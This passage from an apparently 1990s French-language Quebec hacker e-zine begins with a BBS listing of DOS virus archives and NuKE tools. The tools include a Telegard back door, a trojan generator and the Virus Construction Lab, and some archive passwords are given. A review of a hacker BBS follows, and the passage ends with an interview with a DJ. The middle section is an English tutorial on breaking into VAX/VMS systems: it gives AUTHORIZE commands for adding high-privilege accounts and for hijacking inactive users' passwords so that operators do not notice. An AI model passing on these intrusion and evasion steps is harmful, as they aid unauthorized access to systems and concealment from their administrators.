J-INJECT.ZIP 8 50 Jerusalem Injector
J4JV120 .ZIP 10 50 Jump For Joy v1.2 Virus
JABERWOK.ZIP 2 50 Jabberwocky-812 Virus [Jab]
JASMINE .ZIP 1 50 Jasmine Virus (MSK Clone) [MSK]
JER-A204.ZIP 2 50 A-204 Virus (Jerusalem Varient) [Jeru]
JERPUERT.ZIP 2 50 Puerto Rico Virus (Jeru Viriant) [Jeru]
JERSPAIN.ZIP 1 50 Spanish Jerusalem Virus [Jeru]
JERSULEM.ZIP 1 50 Jerusalem Virus [Jeru]
JERU-A .ZIP 24 50 Jerusalem Virus Strain A [Jeru-A]
JERU-B .ZIP 1 50 Jerusalem Virus, Strain B [Jeru]
JERU-C .ZIP 2 50 Jerusalem Virus Strain C [Jeru]
JERU1735.ZIP 1 50 Jerusalem-1735
JERU3 .ZIP 9 50 Jerusalem 3 Virus [Jeru]
JERUB-3 .ZIP 1 50 Jerusalem Virus Stran B3 [Jeru]
JERUB-I1.ZIP 1 50 Jerusalem (sUMsDOS-var) [Jeru]
JERUB-I2.ZIP 3 50 Jerusalem B v2 Virus [Jeru]
JERUB204.ZIP 1 50 Jerusalem (A-204) [Jeru]
JFK .ZIP 11 50 JFK Virus (Frodo/4096) [4096]
JO .ZIP 3 50 Joanna Virus [ARCV] [Joa]
JOEXE .ZIP 2 50 Joanna Exersiser [ARCV] [Joa]
JOJO .ZIP 4 50 JoJo Virus [170x]
JOJO2 .ZIP 3 50 JoJo 2 Virus [170x]
JOKER-01.ZIP 7 50 Joker-1 Virus [Joker]
JOKER-02.ZIP 7 50 Joker-2 Virus [Joker]
JOSHI .ZIP 10 50 Joshi Virus ( Teledisk ) [Joshi]
JOSHIDRP.ZIP 12 50 Joshi Dropper [Drp]
JOSHI_A .ZIP 4 50 Joshi-A Virus
JO_V111 .ZIP 3 50 Joanna v1.1 Virus [ARCV] UnScaned TSR-COM
JULY13 .ZIP 1 50 July 13th Virus
JULY13 .ZIP 2 50 July The 13th Virus
JUNE16TH.ZIP 1 50 June 16th Virus [Jun16]
JUSTICE .ZIP 1 50 Justice Virus [Jus]
KAMASYA .ZIP 2 50 Kamasya Virus [Pest]
KAMIKAZE.ZIP 2 50 Kamikaze Virus [Kami]
KEMEROV .ZIP 0 50 Kemerovo 257-A Virus [Kem]
KENNEDY .ZIP 0 50 Dead Kennedy Virus [Tiny]
KEYDROP .ZIP 2 50 KeyDrop Virus [Drp]
KEYPRESS.ZIP 2 50 Keypress-1232
KIEV493 .ZIP 0 50 Kiev-493 Virus [Kiev]
KILROY .ZIP 0 50 Kilroy Virus
KINNNUKE.ZIP 6 50 Sam Kinnison Virus ( NuKE )
KKK .ZIP 6 50 Klu Klux Klan Virus
KODE4V11.ZIP 0 50 Kode 4 virus v1.1
KODE4V3 .ZIP 0 5 Kode 4 v3.0
KOREA .ZIP 4 50 Korea Virus (TDO) [Korea]
KUANG2 .ZIP 2 50 Kuang Grade Mark-11 Virus [Par]
KYLIE .ZIP 2 50 Kylie Virus (Jerusalem) [Jeru]
LABEL .ZIP 2 50 Label Virus [Label]
LATE .ZIP 1 50 Late Night Virus
LEECH .ZIP 1 50 Leech Virus [Leech]
LEHIGH .ZIP 16 50 LeHigh Virus (Original) [LeHigh]
LEHIGH2 .ZIP 23 50 Lehigh ][ Virus
LEPRO-C1.ZIP 1 50 Leprosy-C1 [Lep3]
LEPRO-C2.ZIP 1 50 Leprosy-C2 [Lep3]
LEPROSY .ZIP 8 50 Leprosy Virus [RMIT]
LEPROSYB.ZIP 12 50 Leprosy Virus, Strain B [LepB]
LEPROSYC.ZIP 1 50 Leprosy Strain C
LEPROSYD.ZIP 0 50 Leprosy Strain D
LIBERTY .ZIP 3 50 Liberty Virus [Liberty]
LIBERTY2.ZIP 3 50 Liberty-2 Virus [Liberty]
LIGHT .ZIP 0 50 Lightning Virus
LISBON .ZIP 0 50 Lisbon Virus [Lisbon]
LISBON2 .ZIP 0 50 Lisbon 2 Virus [GenF][Lisbon]
LOCK_UP .ZIP 0 50 Lock-Up Virus
LOVECHLD.ZIP 0 50 Love Child Virus [LC]
LOZ-1018.ZIP 1 50 Lozinsky 1018 Virus [Loz]
LOZ-1023.ZIP 1 50 Lozinsky 1023 Virus [Loz]
LOZINSKY.ZIP 2 50 Lozinsky Virus [Loz]
LUCIFER4.ZIP 1 50 Lucifer v4.0
LUCIFR61.ZIP 0 50 Lucifer v6.1
LYTHYUM .ARJ 1 50 Lythyum Virus
_16850 .ZIP 10 50 _16850 virus [C16]
------------ -------
508 files 2137088 bytes total
NukE produit aussi des programmes pour hackers et programmeurs de virii.
On trouve entre autres dans leur arsenal original:
[ NuKE Warez ] #7 <NR>
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Filename.Ext Bytes Description
-------- --- -------
-------------------------------------------------------
BYPASS2 .ZIP 6 5 By Pass Trojan (Back maker for TG & Renegard) COM2
HPBOOK .ZIP 78208 - TSR DATABASE - To Store H/P infos
NK-INFO1.ZIP 115712 NuKE Info-Journal #1
NK-INFO2.ZIP 79488 NuKE Info-Journal #2
:PW:514735
NK-INFO3.ZIP 142208 NuKE Info-Journal #3
:PW:POWER
NK-INFO4.ZIP 65152 NuKE Info-Journal #4
:PW:PARTY
NUKE-POX.ANS 2816 Special NuKE Pox v2.0 release ANSI from SSI & UPi!!
NUKECTY2.GIF 22144 VGA for [NuKE] "NuKE City" (320x200x256)
NUKECTY3.GIF 73984 VGA for [NuKE] "NuKE City" (640x480x256)
NUKETYM .ZIP 2 5 NuKE's complete Tymnet OD/NUAs listing v6.2
NUTILS20.ZIP 111872 NoWhere Man Utilities, Has V1.0 + new ones of v2.0
NWHRVC .ZIP 25472 Expansion Kit for V.C.L. (NoWhereMan)
TGBDR15 .ZIP 34688 Telegard Back Door
TROG-V15.ZIP 36352 Trojan Generator
VCL .ZIP 165376 Virus Construction Lab - By: Nowhere Man
:PW: Chiba City
:Must be installed in C:\VCL to work.
------------ -------
15 files 963200 bytes total
-= PAUSE =-
Avis
ceux qui se disent: "Hein? NuKE sortent des Warez? Je
pensais que c'tait un groupe H/P/C/A/V ?!?" Ben, faites le lien
entre les deux, pis a ressemble
a... Tout le monde a droit
l'ducation...
Ct Virus, il y en a environ 1000-1100... Mieux que le 200 avec qui
vous faites peur
votre grand-mre...
Concluons...
En rsum, les valuateurs de NPC donnent deux pouces levs au Cybernetic
Violence. On aime bien communiquer avec ce bab (WE'RE NOT WORTHY!).
Pas pire du tout... Un des meilleurs dans le genre au Qubec... ou
ailleurs.
Pour toute question supplmentaire, quelle qu'elle soit, vous pouvez
rejoindre un officier de Npc. Ils se feront surement un plaisir
de vous rpondre... Pour le Numro, vous pouvez l'avoir sur
n'importe quel bon bbs supportant le Hack/Phreak (Workshop,
Screeming Revulsion, Coffin of Darkness)... Partant du
principe que beaucoup d'entre nous, Qubcois, comptons nos
sous pour les Ld (Sauf en Outdial ou par Code), il est, comme
qui dirait,
porte de ligne... Et bien meilleur que
beaucoup de babs de pacotille aux Us... Bref: a vaut le coup
d'appeler, surtout si vous trippez sur la programmation.
Dormez en paix; la guerre dans le monde c'est pas
pour tout de suite; Etc; Etc...
IN VINO VERITAS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
NPC VOUS ENCOURAGE A NE PAS VOLER: BELL N'AIME PAS LA COMPETITION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
=Creating/Modifying Accounts on a VAX/VMS Operating System=
=by Subhuman Punisher=
The job of creating, modifying or deleting users is performed via
the image AUTHORIZE. This program should be found in the sys$system
directory. This job requires the SYSPRV privilege. To show the list
of all the privileges your account is set up for, type:
$ show proc/priv
If you have the SYSPRV privilege, you can go on and
add/modify/delete users. Typical accounts which have the SYSPRV
privilege are SYSTEM, and FIELD. If your account has the SETPRV
privilege, then you can add the SYSPRV privilege to your account by
typing:
$ set proc/priv=SYSPRV
Assuming you have hacked out an account with the required privilege,
then this is how you start up AUTHORIZE.
$ sd sys$system ; change to sys$system directory
$ run authorize ; self-explanatory
This will return you the User Authorization File prompt (UAF from
now on).
UAF>
The quick and dirty way to create a new user is:
UAF> add [username] /password=[desired_pwd]/priv=[wanted_privileges]
For example:
UAF> add subhuman /password=whatever/priv=setprv
would create a high-privileged user on a system. Of course, you
should avoid adding new accounts when possible. The best idea would
be to find an inactive user and to change his password to whatever
you want. This way, the system operator won't get suspicious. You
should also avoid granting all privileges to a particular user. This
is very easy to detect from the operator's side.
Here are the commands available from the AUTHORIZE program:
ADD | Add a new user. See online help for further information.
COPY | Allows you to copy any record in the UAF to a new user.
CREATE | Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT
| files if they don't already exist.
DEFAULT| Allows you to change any item in the DEFAULT record in SYSUAF.DAT
EXIT | Terminate authorize and go back to the VMS shell.
GRANT | Grants an identifier name to a user UIC
LIST | Makes a listing file (SYSUAF.LIS) which gives information
| on the records specified.
MODIFY | Allows you to modify an existing user. see below.
REMOVE | This allows you to delete an existing user record
RENAME | This allows you to change the username of a record
REVOKE | Revokes an identifier name from a username or UIC identifier
SHOW | Allows you to view the records in SYSUAF.DAT, RIGHTSLIST.DAT and
| NETUAF.DAT
The commands you will be using most from here are SHOW and MODIFY.
Show can be used to isolate INACTIVE accounts (based on last login),
failed login attempts etc. The MODIFY command will let you change
any characteristic in any of the records. Below I will give a short
discussion on some of the more important qualifiers that can be
specified. Note that exactly the same thing applies to the ADD
command:
/ACCESS -if the account is set up for no remote access or whatever, just
include this qualifier (no parameters) to gain FULL access.
/DEFPRIV -your default privileges. These are the privileges that are
active
upon login
/DIR -the directory assigned to you upon login. ie. SYS$LOGIN
/LGICMD -the file that is executed upon login. Normal setting would be
/LGICMD=login.com
/PASSWORD -guess what? your password!
/PRIORITY -CPU priority.
/PRIV -privileges. see below for a list of all privileges.
/PWDMIN -minimum password length
/UIC -User Identification Code. Format: [group,member]
On many systems you will find a file called ADDUSER.COM which allows
the system manager to create new users. It is a DCL file which
simplifies the task of creating new users by prompting you for all
the necessary parameters.
Below is a complete example of the command line. Just type HELP from
the UAF> prompt if you are stuck.
UAF> add DOEJ /own=John Doe /acco=john_doe /dir=SYS$LOGIN /uic=1,
34534,[privs] /passw=whatever
The items here are:
DOEJ -the name you will use on the system
John Doe -your actual name (of course you don't use your REAL name!)
john_doe -your account name, usually used for billing purposes
SYS$LOGIN -your login directory. Best to keep an existing one
1,34534 -your User Id Code. format: [group,member]
whatever -your account password.
[privs] -your account privileges. See below for a complete list of
all privileges available. SETPRV gives you manager access.
type SHOW PROC/PRIV from the DCL prompt ($) to show your
current privileges.
PRIVILEGE DESCRIPTION
-----------------------------------------------------------------------
---------
NONE no privilege at all
NORMAL PRIVS
------------
MOUNT Execute mount volume QIO
NETMBX Create network connections (*you need this to outdial!*)
TMPMBX Create temporary mailbox
GROUP PRIVS
-----------
GROUP Control processes in the same group
GRPPRV Group access through SYSTEM protection field
DEVOUR PRIVS
------------
ACNT Disable accounting
ALLSPOOL Allocate spooled devices
BUGCHK Make bugcheck error log entries
EXQUOTA Exceed disk quotas
GRPNAM Insert group logical names n the name table
PRMCEB Create/delete permanent common event flag clusters
PRMGBL Create permanent global sections
PRMMBX Create permanent mailboxes
SHMEM Create/delete structures in shared memory
SYSTEM PRIVS
------------
ALTPRI Set base priority higher that allotment
OPER Perform operator functions
PSWAPM Change process swap mode
WORLD Control any process
SECURITY Perform security related functions
SHARE Access devices allocated to other users
SYSLCK Lock system-wide resources
FILES PRIVS
-----------
DIAGNOSE Diagnose devices
SYSGBL Create system wide global sections
VOLPRO Override volume protection
ALL PRIVS
---------
BYPASS Disregard protection
CMEXEC Change to executive mode
CMKRNL Change to kernal mode
DETACH Create detached processes of arbitrary UIC
LOG_IO Issue logical I/O requests
PFNMAP Map to specific physical pages
PHY_IO Issue physical I/O requests
READALL Possess read access to everything
SETPRV *** ENABLE ALL PRIVILEGES!!! ***
SYSNAM Insert system logical names in the name table
SYSPRV Access objects through SYSTEM protection field. Great one.
==============
DCL : Digital Command Language
DEC : Digital Equipement Corporation
VAX : Virtual Access eXtension
VMS : Virtual Memory System
==============
=The end=
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
NOUS AVIONS JADIS UN MONOPOLE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OU SONT PASSES LES VRAIS REBELLES?
par
BLITZKREIG
C'est le retour de la chronique des anars, les mecs. C'est le
territoire o vivent les cascadeurs de l'existence, les cingls du
dterminisme, les tmraires qui n'coutent que la seule voix de leur
conscience, celle qui dicte que le boutte du boutte dans la vie, mes fils,
c'est de TOUJOURS faire en sorte que l'on puisse se regarder dans le
miroir sans baisser les yeux, sans rougir de honte. Vivre sa vie sans
faire de compromis, c'est possible. Ceci n'est plus une chronique sur les
pionniers de l'underground au Qubec, c'est maintenant une tribune pour
ceux qui ont compris le vrai sans de la vie. La rponse, mes amis, c'est
de vivre sa vie sans lcher le cul d'un boss mprisant, en faisant un bras
d'honneur aux conventions et aux considrations familiales. Moi, j'ai
trouv des tas de mecs et de nanas pour qui le mot "compromis" n'existe
pas... C'est ces marginaux de la norme que j'ai dcid de vous prsenter
ici, mois aprs mois. Bien sr, il va y avoir des musiciens, des peintres,
des sculpteurs; des artistes, quoi! Par dfinition, tre un artiste, c'est
accepter de prendre des risques. C'est mme tout sauf un choix, prendre
des risques, pour ces gens-l
! Aller tudier au conservatoire de musique
ou de thtre, c'est comme acheter un billet de 6\49 avec ta vie:
seulement 10% des membres de l'Union des Artistes vivent au dessus du
seuil de pauvret. Les autres ont jou le tout pour le tout... MAIS ILS
N'ONT PAS PERDU, les mecs! Ils peuvent encore se regarder dans le miroir
le matin, Dieu merci...
Comme on vient de le voir, vivre sans compromis est une seconde nature
pour la gent artistique. Mais il y a aussi des gens qui refusent une job
dans l'entreprise de papa, ou qui refusent de lcher les culs de ceux qui
dispensent avec parcimonie les emplois, gnralement
ceux qui ont la
langue la plus brune... On peut aussi vivre sans compromis quand on est
acupuncteur, ou boucher, ou conducteur de poids-lourd, n'importe... La
plupart de nos lecteurs, nous le savons, frquentent encore les
institutions d'enseignement qui se spcialisent dans le lavage de cerveau:
"Il y a un avenir pour vous en technologie de la transformation du
minerai, jeune homme. La grappe industrielle n'est pas encore remplie..."
Plutt que d'couter ces cons d'orienteurs, qui ne sont pas l
pour vous
aider, je vous le jure, mais bien plutt pour aider la socit
remplir
les "crneaux" vacants, pourquoi ne pas couter la voix en dedans de vous?
Vous savez, celle qui vous dit: "Fais-toi plaisir, fais ce que tu as envie
de faire! Ne gches-pas ta vie
faire une job merdique pendant trente
ans, une job que tu vas har
chaque minute de ta vie! Fais ce que tu as
VRAIMENT envie de faire!"
Ce qui vous branche, ce qui vous clate, va srement faire de vous des
gens plus panouis que si vous vous destiniez seulement
trouver une job
o on fait du cash... Pensez-y, les kids: vous avez le choix entre le
boulot-rouleau-compresseur, ou une vie sur le fil du rasoir, mais o vous
serez encore capables de vivre avec vous mme et de vous aimer un peu,
bordel...
CASE IN POINT...
Notre rebelle, ce mois-ci, s'appelle Daniel Rochette. Non, ce n'est pas
un handle, c'est le vrai nom d'une vraie personne, en chair et en os, un
vrai rebelle qui a dcid que personne n'avait le droit de dcider de la
conduite de sa vie, hormis lui... Daniel est disc-jockey de son tat. Mais
pas N'IMPORTE
LEQUEL D.J.: c'est le meilleur! L'entrevue s'est droule
sur trois soirs: 15 heures d'entrevue, les mecs! ...Hummm... En fait, pour
tre totalement honnte... J'ai une confession
vous faire... L'entrevue
proprement dite aurait pu se faire en une heure... mais je prenais
BEAUCOUP trop de plaisir
couter tous les nouveaux groupes techno-rave
que ce maniaque de la musique affectionne, et je suis devenu de plus
compltement accro aux mixes GANTS que le sieur Rochette sait seul
concocter...
Blitz- T'as quoi comme ge, mon mec? Au look, comme a, je te donne 24-25
ans...
Daniel- Ha ha! Non! Je suis n le 25 juin 1957!
Blitz- Dans un milieu modeste d'o tu t'es sorti
la force des poignets,
sans doute!
Daniel- Tu veux rigoler, Blitz! Je suis originaire de Sainte-Foy, d'un
quartier cossu de cette banlieue. Mon pre tait propritaire des cuisines
Rochette. Tu connais? Je suis all dans les collges privs, et tout le
cirque. Je suis mme entr dans la compagnie de mon pre, avec un titre
confortable et tout. Ca a dur 4 ans. J'ai mme t vendeur de l'anne...
Blitz- Wow! Que s'est-il pass? Tu t'es fait pincer
manger des cretons
en cachette, et tu as t renvoy?
Daniel- T'es un petit drle, toi! Je savais que c'tait pas moi, ce boulot
l
. Porter une cravate jusqu'
la fin de ma vie... J'ai tout laiss
derrire moi, pis j'ai dcid que j'allais maintenant tenter de gagner ma
vie en m'amusant, qu'il fallait que j'assume mes responsabilits dans la
vie en la gagnant le sourire aux lvres!
Blitz- C'est amusant que tu parles de "responsabilits" dans le contexte.
Il y a des gens qui diraient justement que c'tait un geste irresponsable.
Daniel- Ma vie. Ma peau. J'en fais ce que je veux, et ce que je ne voulais
pas, justement, c'est la perdre
la gagner.
Blitz- Commence ta feuille de route, garon.
Daniel- Mille et un mtiers, depuis, pour financer mes "rves". La radio
est arrive dans ma vie en 83, et j'ai rapidement ralis que spinner des
disques correspondait
ce que je voulais faire. Donc, CKRL en 1983, avec
une premire mission
saveur new-wave et punk, TRANSMISSIONS.
Blitz- C'est aussi
cette poque que tu t'es mis
descendre
New-York
tous les trois mois pour ramener des piles de galettes de Run-DMC et
Grandmaster Flash...
Daniel- J'ai effectivement dcouvert le rap
cette poque, et j'ai mme
t le premier
en faire jouer sur les ondes de la radio
Qubec. Pour
revenir
mon exprience
CKRL, j'ai particip
la premire quinzaine
Internationale de la Radiophonie, et j'ai produit et ralis plusieurs
missions qui ont t entendues sur les radios communautaires
travers
le monde.
Blitz- Je me souviens que tu avais fait venir THE SOPHIST, un cingl de
la musique lectronique que tu avais dcouvert
New-York!
Daniel- Ouais, le pied! Et puis, avec les dmnagements des locaux de CKRL
de l'universit vers la rue Ste-Ursule, j'ai eu de plus en plus
d'missions
ma charge. LES AUDIENCES DE LA CEBO (Commission d'Enqute
sur le Bruit Organis) fut une srie que nous avions ralis ensemble et
qui a connu un certain succs. Nous avions un contrat avec le New Music
Express de Londres pour diffuser une srie d'une cinquantaine d'entrevues
avec des groupes comme Cocteau Twins, Diamanda Galas, Sisters of Mercy,
etc... Une deuxime quinzaine internationale de la radiophonie qui a eu
un succs boeuf. Et plein de trucs encore... L'mission spciale sur la
venue du pape
Qubec, tu te souviens?
Blitz- J'en ris encore! Et ta vie de DJ hors de CKRL?
Daniel- J'ai fait les beaux jours, ou plutt les belles nuits, de l'Ombre
Jaune,
l'poque. Mes gots musicaux continuaient
voluer, et j'ai
toujours russi
trouver LE son, nouveau et intressant, qui allait
former la prochaine vague
la mode... Plusieurs autres clubs ont aussi
got
ma mdecine. Et puis, je me suis dit que a pourrait tre une
exprience enrichissante de travailler
mon propre compte.
Blitz- Et a a pris la forme de...?
Daniel- Je me suis mis
"manager" quelques groupes de Qubec, et
produire des spectacles et des albums. Les PRODUCTIONS DERNIER RECOURS,
c'tait moi! J'ai produit le premier album de Hunting Today, par exemple.
J'ai organis des tas de shows
Qubec, Front 242 deux fois, Chris Isaak
au Vieux Port, Ludwig van 88, Les Garons Bouchers, Killing Joke, Dread
Zeppelin, Les Bruriers Noirs, etc... Je me suis ruin, financirement,
produire de tels spectacles. J'ai perdu quelque chose comme 30 000$ en
deux ans. C'est pas rentable, ce genre de truc, si t'es pas un Donald K.
Donald. Pis je m'enttais
faire venir du stuff que j'aimais, mais qui
n'tais pas encore "au got du jour". Toujours la maudite longueur
d,avance... Chris Isaak, par exemple, qui est venu par deux fois donner
des fichus bons spectacles
Qubec, mais c'tait encore AVANT que le film
de David Lynch fasse connatre "Wicked game"...
Blitz- Tu as aussi possd ton propre club pendant un moment...
Daniel- Oui, j'tais co-propritaire du ARTEFAXX, sur la Cte de la
Fabrique. Ca avait une gueule d'enfer, mais on a vendu parce que je
n'avais pas la bosse de l'administration, et mon collgue non-plus
d'ailleurs. On a fait du fric avec la vente, ce qui m'a permis de me
lancer dans d'autres avenues. Le Artefaxx est maintenant un restaurant de
fruits de mer, le POISSON D'AVRIL, je crois...
Blitz- Tu as aussi fait de la performance vido...
Daniel- Oui, mais, c'tait vraiment juste un
-ct... Avant tout a, il
y avait encore la musique, et toutes ces nouvelles sonorits qui me
hantaient. J'ai import le son "batcave" alors qu'il n'tait encore qu'une
rumeur
Londres, et puis... j'ai dcouvert, au cours d'un de mes voyages
Amsterdam, les acid houses. Ca m'a clat, cette affaire-l
. Je me suis
mis
explorer, en mme temps que plusieurs petits tripatouilleurs de sons
aux quatre coins du monde, sur l'intgration de l'acid music
la techno,
je me suis mis
dvelopper le son "rave".
Blitz- Et qu'en as-tu fait?
Daniel- je suis depuis quelques temps redevenu un "DJ for hire"... Je ne
travaille plus dans une bote en particulier, j'organise plutt, sur
demande, des soires rave chez les gens qui en veulent une.
Blitz- J'ai attrap une de tes dernires prestations
L'Amour Sorcier.
Chapeau!
Daniel- Que ce soit
L'Amour, ou au Bizz, ou
la Fourmi Atomik, ou au
Bal du Lzard, nomme-les, je les connais tous... Je prfre les partys
"privs" organiss par des individus, pour une gang de chums. J'ai parfois
des contrats
Montral. Rien de mieux qu'une grande salle moche avec un
minimum d'quipement, je trouve. La soire est une russite par la seule
force de ta musique et de ton animation dans ce temps-l
.
Blitz- ACiiiiiiiiiiiiiiiiiiiiD!
Daniel- Yeah!
Blitz- Et si on parlait de la musique elle-mme pour terminer? Parle-moi
de la cyber-musik, de la techno, du rave, de l'acid, et des distinctions
qu'il faut y faire...
Daniel- Toutes les musiques que tu viens de me nommer ont ceci de
particulier, par rapport au sonorits plus traditionnelles du rock: avec
ces nouveaux sons, tu as 25 ans, au bas mot, de dextrit musicale qui
viennent de prendre le bord de la poubelle. Nous sommes passs de
l'aptitude physique
produire des sons en matrisant un instrument
l'aptitude MENTALE
concevoir des sons
partir de sources sonores dj
existantes et que l'on hacke, comme tu dirais, que l'on perverti...
Blitz- Je lisais justement une dfinition dans un bouquin l'autre jour
[NdE: Storming the reality studio: A casebook of cyberpunk and PostModern
Science fiction, par Larry McCaffery], une dfinition intressante de la
cybermusik: feeding the noise back into the system. Ralimenter le bruit
dans le systme qui l'a gnr. Comme Ensturzende Nbaten, par exemple,
qui reprend les sons "industriels", les scies, les marteaux-piqueurs, les
sons d'une socit industrielle, pour les retourner dans les oreilles de
cette socit, compltement harmoniss, au niveau du concept.
Daniel- C'est pas ncessairement une approche ludique trs novatrice, car
un groupe comme Kraftwerk, par exemple, dmontrait depuis des annes que
l'aptitude
programmer des sons et des squences pouvait prendre le pas
sur l'expertise manuelle d'un instrument. Sauf que, maintenant, le
synthtiseur-chantillonneur est un instrument
part entire de tout
groupe qui se respecte, et la construction, l'chafaudage d'un phras
musical englob dans son entiret par ces instruments est le propre d'une
multitude de hacker-musiciens. Front 242, Test Departement, Future Sound
Of London, Ministry, etc... Je ne dis pas que tous ces groupes forment la
totalit de ce qui devrait tre couvert par ce terme de "cybermusik", mais
c'est une des avenues les plus dansantes,
tout le moins.
Blitz- Je suis all
ta dernire soire rave, et j'ai remarqu que le
beat d'enfer qui meut toutes ces jambes et ces corps sur la piste de danse
n'est pas sans me rappeler, malheureusement, la disco des annes 70.
Daniel- Et pourtant, pour l'oreille avertie, les pulsations par minute ont
augment au fil des annes. Par exemple, le disco pousait un rythme de
120 beat/minute. La musique rave la plus violente pousse maintenant des
pointes jusqu'
200 b/m... La moyenne des productions techo et acid se
situe autour de 160
180 b/m.
Blitz- Et pour les amateurs du genre, quels sont les groupes que nous
devrions surveiller?
Daniel- Je vais faire mieux que a, Blitz. A compter de ce mois-ci, je
vais vous offrir de publier dans NPC un top five des meilleurs groupes de
rave/techno/house.
Blitz- Ca va te prendre un handle si tu veux crire pour nous!
Daniel- Pas de problme... GENGIS DAN, a te va?
Blitz- Ouais, super! Dankechein, Daniel!
Daniel- Merci
NPC!
----------------------
TOP 5 AMBIENT/TECHNO
Groupe/celllule Titre chanson Titre album # tiquette
1-United Frequen- Gemini 6 U.F.O.T MFS-7027-2
cies Of Trance Vol. 2
2-Electric Music Intercomix Crosstalk SPV-056-
110363
3-Polygon Window If it really Surfing on WARP CD-7
isn't me sine waves
4-The Future Papua New Accelerator Jumpin and Sound
of Guinea Pumpin CD-
London TOT-2
5-Forgotten Echoes 3000 OHM! Suck CD3
Worlds (compilation)
--------------
Co0l Dude. Si vous dsirez organiser des soires rave pour votre cole,
votre bureau, l'enterrement de votre poddle, n'hsitez pas
contacter
Daniel au 418-694-1104. Dites-lui que c'est NPC qui vous envoie, et il
vous fera un prix d'ami! Daniel a profit de l'occasion pour crer un
super-mix NPC qui va jouer dans ses prochaines soires. Un de vos copains
a peut-tre dj
la cassette entre les mains. Nous allons en sampler un
extrait pour faire un .VOC que vous pourrez trouver, tout
fait
gratuitement, sur les boards NPC de Qubec. On pourrait pas vous mettre
tout le mix au complet, malheureusement, sinon a ferait 20 megs...
En passant, il y a aussi un .GIF NPC sur ces boards, une oeuvre originale,
inspire du mouvement constructiviste russe de l'entre-deux guerres. Cette
peinture a t ralise par un artiste originaire de la rgion 418, Louis
Rmillard. M. Rmillard a un portfolio trs intressant: ses lithographies
et estampes sont exposes aussi bien au Japon qu'
Berlin, et, plus proche
de nous, le Muse du Qubec s'est port acqureur de quelques unes de ses
oeuvres pour sa collection permanente. Lorsqu'il n'excute pas des
commandes spciales pour NPC, le travail de M. Rmillard rflte une
proccupation indniable pour la ville et ses travers. Nous vous tiendrons
informs des lieux et dates de la prochaine exposition solo du sieur
Rmillard sur son sol natal, a va vous brancher, j'en suis certain...
Le GIF, le VOC, il ne nous reste plus qu'
organiser le NPC World Tour:
une tourne de tous les pnitenciers fdraux de la province, peut-tre?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
